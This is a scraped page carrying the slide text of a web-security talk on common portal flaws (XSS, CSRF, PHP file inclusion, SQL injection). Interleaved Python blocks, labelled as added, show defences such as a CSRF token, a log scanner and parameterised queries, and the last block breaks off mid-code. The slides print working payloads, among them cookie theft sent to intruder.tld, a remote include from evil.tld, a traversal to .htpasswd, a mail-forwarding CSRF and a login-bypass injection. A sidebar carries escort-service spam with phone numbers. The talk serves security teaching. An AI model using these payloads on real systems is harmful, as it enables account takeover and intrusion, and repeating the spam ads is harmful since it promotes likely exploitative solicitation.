Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiemReputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
Reputacja jako aktywa. Zagrożenia, przewidywanie strat i zarządzanie ryzykiem
 

Recently uploaded

Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...lizamodels9
 
Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Seta Wicaksana
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607dollysharma2066
 
2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis UsageNeil Kimberley
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?Olivia Kresic
 
Call Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any TimeCall Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any Timedelhimodelshub1
 
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCRashishs7044
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03DallasHaselhorst
 
The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024christinemoorman
 
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...lizamodels9
 
Future Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionFuture Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionMintel Group
 
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City GurgaonCall Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaoncallgirls2057
 
Case study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailCase study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailAriel592675
 
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable  and Resilient Coconut Industry by Dr. Jelfina...Global Scenario On Sustainable  and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...ictsugar
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCRashishs7044
 
Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Kirill Klimov
 
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,noida100girls
 
Digital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfDigital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfJos Voskuil
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africaictsugar
 
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxContemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxMarkAnthonyAurellano
 

Recently uploaded (20)

Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
Call Girls In Radisson Blu Hotel New Delhi Paschim Vihar ❤️8860477959 Escorts...
 
Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...Ten Organizational Design Models to align structure and operations to busines...
Ten Organizational Design Models to align structure and operations to busines...
 
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607FULL ENJOY Call girls in Paharganj Delhi | 8377087607
FULL ENJOY Call girls in Paharganj Delhi | 8377087607
 
2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage2024 Numerator Consumer Study of Cannabis Usage
2024 Numerator Consumer Study of Cannabis Usage
 
MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?MAHA Global and IPR: Do Actions Speak Louder Than Words?
MAHA Global and IPR: Do Actions Speak Louder Than Words?
 
Call Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any TimeCall Girls Miyapur 7001305949 all area service COD available Any Time
Call Girls Miyapur 7001305949 all area service COD available Any Time
 
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
8447779800, Low rate Call girls in Shivaji Enclave Delhi NCR
 
Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03Cybersecurity Awareness Training Presentation v2024.03
Cybersecurity Awareness Training Presentation v2024.03
 
The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024The CMO Survey - Highlights and Insights Report - Spring 2024
The CMO Survey - Highlights and Insights Report - Spring 2024
 
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
Call Girls In Sikandarpur Gurgaon ❤️8860477959_Russian 100% Genuine Escorts I...
 
Future Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted VersionFuture Of Sample Report 2024 | Redacted Version
Future Of Sample Report 2024 | Redacted Version
 
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City GurgaonCall Us 📲8800102216📞 Call Girls In DLF City Gurgaon
Call Us 📲8800102216📞 Call Girls In DLF City Gurgaon
 
Case study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detailCase study on tata clothing brand zudio in detail
Case study on tata clothing brand zudio in detail
 
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable  and Resilient Coconut Industry by Dr. Jelfina...Global Scenario On Sustainable  and Resilient Coconut Industry by Dr. Jelfina...
Global Scenario On Sustainable and Resilient Coconut Industry by Dr. Jelfina...
 
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
8447779800, Low rate Call girls in New Ashok Nagar Delhi NCR
 
Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024Flow Your Strategy at Flight Levels Day 2024
Flow Your Strategy at Flight Levels Day 2024
 
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
BEST Call Girls In Old Faridabad ✨ 9773824855 ✨ Escorts Service In Delhi Ncr,
 
Digital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdfDigital Transformation in the PLM domain - distrib.pdf
Digital Transformation in the PLM domain - distrib.pdf
 
Kenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby AfricaKenya’s Coconut Value Chain by Gatsby Africa
Kenya’s Coconut Value Chain by Gatsby Africa
 
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptxContemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
Contemporary Economic Issues Facing the Filipino Entrepreneur (1).pptx
 

Minor Mistakes In Web Portals

  • 1. Minor Mistakes in Web Portals A Real Case Study ;-) Borys Łącki Michał Sobiegraj, CISSP
  • 2. Why is the Web important? M
  • 3. Web is everywhere M
  • 4. We spend money. We manage our finances. We earn money. We waste our time. M
  • 5. Internet traffic http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 6. 2007: Web traffic has finally overtaken P2P M
  • 7. Web has beaten pr0n! YAY!* * not supported by any research M
  • 8. HTTP traffic breakdown http://www.ellacoya.com/news/pdf/2007/NXTcommEllacoyaMediaAlert.pdf M
  • 9. Number of Internet hosts increases Over 60 mln active hosts (netcraft) M
  • 10. Web security in a nutshell M
  • 11. Web vulnerabilities make up nearly half of all discovered vulnerabilities in 2007 (SANS) M
  • 12. Why? A really popular medium ($); immature technology; logical errors; home-made solutions M
  • 13. Phishing victims in the US 3.6 million of people lost $3.2 billion total (Gartner, http://www.heise-online.pl/news/item/2356/) M
  • 14. Standard Web application architecture Internet WWW layer (I/O filters) Application layer (business logic) Database server M
  • 15. Wrong! Internet WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 16. Application Firewall vs. proper architecture, coding and SDLC Internet Web Application Firewall WWW layer (I/O filters) New functionality Application layer (business logic) Database server M
  • 17. The right approach Internet Web Application Firewall WWW layer (I/O filters) Application layer New functionality (business logic) Database server M
  • 18. Most popular attacks: PHP Remote File Include, SQL Injection, Cross-Site Scripting, Cross-Site Request Forgery (SANS Top-20 2007 Security Risks, 2007 Annual Update) M
  • 19. Information disclosure B
  • 20. A funny story ;-) B
  • 21. More pics hmm… B
  • 22. B
  • 23. :-D B
  • 24. Downloaded… B
  • 25. Connecting… B
  • 26. PWND ;-) B
  • 27. Conclusion? Staying secure requires specific mindset (Paranoia? ;-) B
  • 28. Client side access control: it's possible to bypass the interface (unlike in ATMs). Does not work! B
  • 29. Client side access control. RSS feed name based on the user ID: server.tld/rss/100_rss.xml server.tld/rss/101_rss.xml server.tld/rss/102_rss.xml. Reading other users' messages: server.tld/index.php?p=ok&action=msgs2&msgs_id=80 server.tld/index.php?p=ok&action=msgs2&msgs_id=81 server.tld/index.php?p=ok&action=msgs2&msgs_id=82 B
  • 30. Solution: Server side access control B
  • 31. Cross-Site Scripting (XSS) B
  • 32. Reflective XSS Server http://server/index.php?id=<script>…</script> GET /index.php? id=<script>…</script> HTTP/1.1 Web Intruder Application User …<script>…</script>… exec(…) Data available in the context of the User B
  • 33. Example XSS code document.write('<img src="http://intruder.tld/cookiemonster.gif?'+escape(document.cookie)+'">'); B
  • 34. Content alteration through an XSS attack B
  • 35. Rebranding through XSS http://server.tld/topics/%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));%3C%252fscript%3E which decodes to document.getElementById("logo").innerHTML="<img src='http://www.srv.tld/images/smiley.gif'>" M
  • 36. This is how it looks in the webpage code ... <div id="maincontent"> <h2>Results for: <span style="color: #f00;"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,108,111,103,111,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,105,109,103,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,101,122,111,116,101,114,105,107,97,46,112,108,47,105,109,97,103,101,115,47,115,109,105,108,101,121,46,103,105,102,39,62,34));</script></span></h2> </div> ... M
  • 37. The code that is to be changed <div id="logo"> <div class="logolink"> <a href="http://server.tld/">server.tld</a> </div> ... </div> M
  • 38. The code in a Web browser M
  • 39. Final outcome M
  • 40. Rendered in a browser M
  • 41. Content change using XSS: is not permanent; better code → easier (sic!). An idea: a form that looks just like a legitimate one, but sends the input data elsewhere → phishing B
  • 42. Authentication using cookies. User → Server: POST /login.php HTTP/1.1 login=user&password=asd12ed]r3. Server → User: HTTP/1.1 200 OK Set-Cookie: user_id=734223s8uod42 Welcome user. User → Server: GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42. Server → User: Welcome user B
  • 43. Impersonating a legitimate user. User → Server: POST /login.php HTTP/1.1 login=user&password=asd12ed]r3. Server → User: HTTP/1.1 200 OK Set-Cookie: user_id=734223s8uod42 Welcome user. User → Server: GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 → Welcome user. Intruder → Server: GET /index.php HTTP/1.1 Cookie: user_id=734223s8uod42 → Welcome user B
  • 44. Session cookie hijacking http://www.server.tld/index.php?p=comments&comments_login=smietanka%3Cscript%3Edocument.write(document.cookie)%3C/script%3E → PHPSESSID=gji9h519llgbgbnaqg7si0q1l0; __utma=258102041.949163972.1198624259.1198624259.1198624259.1; __utmb=258102041; __utmc=258102041; __utmz=258102041.1198624259.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none) M
  • 45. M
  • 46. M
  • 47. M
  • 48. How to send yourself a cookie? XMLHttpRequest: troublesome across domains. A link: img, iframe, location.href, etc. Example: <img src="http://server.tld/cookiemonster.gif?PHPSESSID%3Dgji9h519llgbgbnaqg7si0q1l0%3B%20__utma%3D258102041.949163972.1198624259.1198624259.1198624259.1%3B%20__utmb%3D258102041%3B%20__utmc%3D258102041%3B%20__utmz%3D258102041.1198624259.1.1.utmccn%3D%28direct%29%7Cutmcsr%3D%28direct%29%7Cutmcmd%3D%28none%29"> B
  • 49. What can we do? Tie the session ID to an IP address; require re-authentication; filter or sanitise input data!!! - White-listing (ScRipT) - Consistency (IDS, firewall, application) - In depth (....// → ../), UTF-7 B
  • 50. http://server.tld/topics/<img src=http://www.serv.tld/images/smiley.gif> / M
  • 51. http://server.tld/topics/<img src=http:%2f%2fwww.serv.tld%2fimages%2fsmiley.gif> %2f → / M
  • 52. http://server.tld/topics/<img src=http:%252f%252fwww.serv.tld%252fimages%252fsmiley.gif> %252f → %2f → / M
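Slides 49 to 52 make one point: a filter that runs once over the raw input is bypassed by nesting (`....//` becomes `../` after one strip of `../`), by case (`ScRipT` passes a case-sensitive blacklist) and by double encoding (`%252f` survives one URL decode and turns into `/` on the next). The Python below is an added illustration and is not code from the talk: it puts a naive one-pass blacklist next to a canonicalize-then-whitelist check for an include-file name such as slide 68's `$page`. The `page_name_ok` function, the allowed-name pattern and the four-round decode limit are assumptions made for the example.

```python
import re
from urllib.parse import unquote


def naive_strip(value):
    """One-pass blacklist of the kind slide 49 warns about.

    It removes '../' exactly once and matches '<script' case-sensitively,
    so nested and case-shifted payloads survive it.
    """
    return value.replace("../", "").replace("<script", "")


def canonicalize(value, max_rounds=4):
    """Percent-decode until the value stops changing (%252f -> %2f -> /).

    Validation must run on this canonical form; otherwise the still-encoded
    payload passes the check and is decoded later by the application.
    A value that keeps changing after max_rounds is treated as hostile.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


# Assumption for the example: include-file names are short single path
# segments made of [A-Za-z0-9_-]; anything else is rejected, not cleaned.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def page_name_ok(raw_page):
    """White-list check for a parameter like slide 68's $page, after canonicalization."""
    try:
        canonical = canonicalize(raw_page)
    except ValueError:
        return False
    return PAGE_NAME.fullmatch(canonical) is not None


def demo():
    return {
        # nested traversal: one strip of '../' leaves '../' behind
        "nested": naive_strip("....//"),
        # case-shifted tag is untouched by a case-sensitive blacklist
        "case": naive_strip("<ScRipT>alert(1)</ScRipT>"),
        # double encoding: one decode leaves %2f, which is '/' after the next
        "double": canonicalize("%252e%252e%252fetc%252fpasswd"),
        "ok": page_name_ok("news"),
        "traversal": page_name_ok("../../../../../../home/user1/public_html/.htpasswd%00"),
        "double_rejected": page_name_ok("%252e%252e%252fetc%252fpasswd"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

The white-list does not try to repair the value: a name that is not a plain identifier after full decoding is refused outright, which is the "consistency" point on slide 49 (the check sees the same bytes the include statement will see).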
  • 53. B
  • 54. Stored XSS Server POST /register.php HTTP/1.1 login=<script>…</script>&password=asd Web Application GET /index.php HTTP/1.1 <script>…</script> User …<script>…</script>… Intruder exec(…) Database Data available in the context of the User B
  • 55. Stored XSS exploitation? Permanent content alteration; easy session ID hijack; CSRF; XSS proxy; automated worms - MySpace, Orkut, Nduja, Borys ;] Easy in web portals that allow users to publish their own content: bidding portals, blogs, web fora, etc. B
  • 56. Session ID hijack B
  • 57. XSS Worm Web Server Stores the XSS-worm code in their profile Intruder XSS … Intruder User_1 User_2 B
  • 58. XSS Worm Web Server Stores the XSS-worm code in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… … exec(…) Stores the XSS-worm code in their profile Intruder User_1 XSS User_2 B
  • 59. XSS Worm Web Server Stores the XSS in their profile GET /intruder/ HTTP/1.1 User_1 Intruder XSS …<script>…</script>… User_2 … Stores the XSS-worm exec(…) code in their profile Intruder GET /user1/ HTTP/1.1 User_1 XSS …<script>…</script>… Stores the XSS-worm exec(…) User_2 XSS code in their profile B
  • 60. Nduja – A Cross Domain/Webmail XSS Worm Intruder E-mail E-mail E-mail E-mail Web Web Web Web Server Server Server Server WebMail WebMail WebMail WebMail Libero.it Tiscali.it Lycos.it Excite.com B
  • 61. What can we do? Tie the session ID to an IP address; require re-authentication; filter or sanitise input data!!! - White-listing (ScRipT) - Consistency (IDS, firewall, application) - In depth (....// → ../), UTF-7. Filter or sanitise data stored in and read from the database B
  • 62. Cross-Site Request Forgery (CSRF) B
  • 63. CSRF Server http://server.tld/delete.php?id=34 Web Application GET /delete.php?id=34 HTTP/1.1 Cookie: user_id=734223s8uod42 … id = 34; Intruder delete(id); User … Item deleted! M
  • 64. Useful in getting to know your users a wee bit better… <img src="http://nasza-klasa.pl/invite/1?i=1"> (/var/log/apache/fbi_cia_what-not_access.log) B
  • 65. Gmail message interception (CSRF) http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/wt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter Everyone (well, almost) has a Gmail account! (Domain hijack: www.davidairey.co.uk) B
  • 66. What can we do? POST instead of GET → not very bullet-proof: iframe, JavaScript. Referrer → not very bullet-proof either: proxy, browsers, header alteration. Additional temporary ID: user ID tied to a long unpredictable key; ID-key association held on the server side. Re-authentication before sensitive operations. Vulnerability-free code!!! B
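Slide 66's "additional temporary ID" is the synchronizer token: a long random value minted per session, kept server side, embedded in the site's own forms and required on every state-changing request. The Python below is an added example, not code from the talk; it replaces slide 63's `GET /delete.php?id=34` with a handler that checks method, session and token, and then replays the forged requests the slides describe. The request dict, the `PHPSESSID` cookie name and the in-memory `SESSIONS` store are assumptions made for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs

# Server-side session store: session id -> session data. A constructed stand-in
# for whatever the portal keeps behind its PHPSESSID cookie.
SESSIONS = {}


def login(user_id):
    """Create a session and mint its anti-CSRF token (the 'long unpredictable key')."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user_id": user_id, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token(sid):
    """Token the server embeds in its own forms; a page on another origin cannot read it."""
    return SESSIONS[sid]["csrf"]


def handle_delete(request):
    """Hardened replacement for slide 63's GET /delete.php?id=34.

    `request` is a constructed dict: method, cookies (dict) and body
    (form-encoded string). Returns (status, message).
    """
    if request["method"] != "POST":
        return 405, "state changes require POST"
    sess = SESSIONS.get(request["cookies"].get("PHPSESSID", ""))
    if sess is None:
        return 401, "not logged in"
    form = parse_qs(request.get("body", ""))
    submitted = form.get("csrf", [""])[0]
    # The browser attached the cookie automatically, but only a form served by
    # this site can carry the matching token. Constant-time compare.
    if not hmac.compare_digest(submitted, sess["csrf"]):
        return 403, "CSRF token missing or wrong"
    item_id = form.get("id", [""])[0]
    return 200, f"item {item_id} deleted by user {sess['user_id']}"


def demo():
    sid = login(734223)
    cookies = {"PHPSESSID": sid}
    legit = {"method": "POST", "cookies": cookies,
             "body": f"id=34&csrf={csrf_token(sid)}"}
    # Slide 63: <img src="http://server.tld/delete.php?id=34"> on the intruder's page
    forged_get = {"method": "GET", "cookies": cookies, "body": ""}
    # Slide 66: POST alone does not help; a hidden auto-submitting form in an
    # iframe still carries the victim's cookie, but it cannot carry the token
    forged_post = {"method": "POST", "cookies": cookies, "body": "id=34"}
    guessed = {"method": "POST", "cookies": cookies,
               "body": "id=34&csrf=" + secrets.token_urlsafe(32)}
    return {
        "legit": handle_delete(legit)[0],
        "forged_get": handle_delete(forged_get)[0],
        "forged_post": handle_delete(forged_post)[0],
        "guessed_token": handle_delete(guessed)[0],
    }


if __name__ == "__main__":
    print(demo())
```

The token stops a request forged from another origin. It does not help once the site also has XSS (slide 55 lists CSRF among the stored-XSS consequences): script injected into the site's own origin can read the token out of the page and submit it.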
  • 67. PHP File Include B
  • 68. Local file include: local file snoop (configs); arbitrary code execution (if file upload to the server is permitted); access to source code.
<?php
if (file_exists("includes/$page.inc")) {
    include "includes/$page.inc";
} else {
    echo "In construction!<BR>";
}
http://XXXXX.art.pl/p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00 B
  • 69. Remote file include (arbitrary code execution)
<?php
include($mosConfig_absolute_path."/administrator/components/com_hashcash/config.hashcash.php");
require_once($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
http://server.tld/components/com_hashcash/server.php?mosConfig_absolute_path=http://evil.tld/evil.txt?
access_log:62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803"
access_log:168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76" B
  • 70. What can we do? Harden the application server (e.g. in php.ini):
allow_url_fopen = Off
allow_url_include = Off
register_globals = Off
safe_mode = On
safe_mode_gid = Off
display_errors = Off
log_errors = On
error_log = /var/log/httpd/php_error.log
disable_functions = system, shell_exec, exec, passthru
Watch out for some special characters (null byte, etc). Filter and sanitise (../, UTF, etc). WAFs: mod_security, Suhosin PHP B
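The two access_log lines on slide 69 are what mass RFI scanning looks like from the server side: a query parameter whose value is a full URL to the attacker's text file, a trailing `?` so that the rest of the include path becomes a query string on the attacker's host, and a `libwww-perl` User-Agent. The Python below is an added example, not code from the talk: it parses combined-format log lines and flags remote-URL and traversal values in query parameters. The sample log is constructed for the example; two lines mirror the slide's entries (masked IPs kept), one mirrors slide 68's `.htpasswd%00` request and one is benign traffic from slide 29.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache combined log format, as in the access_log excerpts on slide 69.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a URL is the remote-include signature.
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

# Constructed sample log modelled on slides 68, 69 and 29.
SAMPLE_LOG = """\
62.48.xxx.xx - - [06/Jan/2008:07:11:06 +0100] "GET //install/index.php?G_PATH=http://www.js2023.pl//modules/PNphpBB2/images/.bash/pr.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.803"
168.212.xxx.xxx - - [06/Jan/2008:22:57:53 +0100] "GET /files/strawberry/plugins/wacko/highlight/html.php?text=http://www.nakedarena.com/id.txt? HTTP/1.1" 404 1021 "-" "libwww-perl/5.76"
192.0.2.10 - - [06/Jan/2008:23:01:10 +0100] "GET /p.php?page=../../../../../../../../../home/user1/public_html/.htpasswd%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.11 - - [06/Jan/2008:23:02:44 +0100] "GET /index.php?p=ok&action=msgs2&msgs_id=80 HTTP/1.1" 200 5120 "http://server.tld/" "Mozilla/5.0"
"""


def scan_line(line):
    """Return a list of findings for one log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Split on the first '?' by hand: urlsplit() would read '//install' as a host.
    _, _, query = m["target"].partition("?")
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        canonical = unquote(value)  # parse_qsl decoded once; catch a second layer
        kind = None
        if REMOTE_URL.match(canonical):
            kind = "RFI"
        elif "../" in canonical or "\x00" in canonical:
            kind = "LFI"
        if kind:
            findings.append({
                "ip": m["ip"], "param": name, "kind": kind,
                "status": m["status"], "ua": m["ua"],
                # trailing '?' turns the rest of the include path into a query string
                "trailing_qmark": canonical.endswith("?"),
                "scanner_ua": m["ua"].startswith("libwww-perl"),
            })
    return findings


def scan(log_text):
    """Run scan_line over every non-empty line of a log."""
    return [f for line in log_text.splitlines() if line.strip() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Both slide-69 hits were 404s: the scanner probed components this host does not run. The same requests against a host that does run them, with `allow_url_include` left on, are a remote code execution, so the right response to a 404 hit is to confirm the php.ini settings on slide 70, not to ignore it.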
  • 71. SQL Injection M
  • 72. SQL Injection. Intruder → Server: GET /login.php HTTP/1.1 login=admin&password=1' or 1='1 → select * from users where login='admin' and pass='1' or 1='1' → Welcome admin!
$dane = db_exec("select * from users where login='$login' and pass='$pass'");
if (count($dane)) {
    print("Welcome $login");
    …
} else {
    print("Bye");
    exit(0);
}
M
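Slide 72's login is vulnerable because the user's input is pasted into the SQL text, so the quote in `1' or 1='1` closes the `pass` literal and appends an always-true condition. The Python below is an added example, not code from the talk: it reproduces that query against an in-memory SQLite table and then shows the fix slide 89 asks for in its "application" and "database" consistency layers, a bound-parameter query. The `users` rows are constructed. One caveat for the reader: SQLite compares the integer literal `1` and the text literal `'1'` as unequal, so the exact MySQL form `1' or 1='1` does not open this toy; `1' or '1'='1` does, and is the same trick.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the portal's users table (made-up rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, pass TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "s3cret"), ("user", "asd12ed]r3")])
    return db


def login_vulnerable(db, login, password):
    """Same construction as the slide's db_exec("... login='$login' and pass='$pass'")."""
    sql = f"select * from users where login='{login}' and pass='{password}'"
    rows = db.execute(sql).fetchall()
    return f"Welcome {login}" if rows else "Bye"


def login_fixed(db, login, password):
    """Bound parameters: the values travel separately from the statement text,
    so a quote in the input can never change the query's structure."""
    sql = "select * from users where login=? and pass=?"
    rows = db.execute(sql, (login, password)).fetchall()
    return f"Welcome {login}" if rows else "Bye"


def demo():
    db = make_db()
    # pass='1' or '1'='1'  ->  (login='admin' and pass='1') or ('1'='1')
    payload = "1' or '1'='1"
    # the slide's literal MySQL payload; 1='1' is false under SQLite's typing rules
    mysql_payload = "1' or 1='1"
    return {
        "vuln_legit": login_vulnerable(db, "user", "asd12ed]r3"),
        "vuln_inject": login_vulnerable(db, "admin", payload),
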